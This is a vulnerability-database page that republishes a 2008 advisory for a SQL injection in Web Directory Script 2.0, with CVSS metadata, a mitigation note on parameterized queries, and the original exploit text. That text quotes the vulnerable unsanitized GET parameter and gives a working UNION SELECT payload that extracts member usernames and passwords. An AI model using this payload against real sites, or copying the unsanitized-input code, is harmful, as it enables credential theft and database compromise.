Web Directory Script - exploit.company

vendor:

Web Directory Script

by:

~!Dok_tOR!~

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Web Directory Script

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:nullscript:web_directory_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Web Directory Script <= 2.0 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'name' parameter to '/listing_view.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information stored in the database, modify data, compromise the system, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use prepared statements, parameterized queries or stored procedures instead of dynamic SQL queries.

Source

Exploit-DB raw data:

Web Directory Script <= 2.0 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 23.08.08
Product: Web Directory Script
Version: 2.0
Download script: http://rapidshare.com/files/121448809/W3bDirScr2-nullscript.net.rar
Password: nullscript.net
Vulnerability Class: SQL Injection

listing_view.php

Vuln code:

$friendly_url=$_GET['name'];

http://localhost/[installdir]/

magic_quotes_gpc = Off

Exploit:

listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*

Thanks: Zitt, rijy, Koller, NOmeR1, $n@]<e, n0ne, +toxa+, [cash], ettee, HiM@S and All members of antichat.ru and xaker.name .

# milw0rm.com [2008-08-25]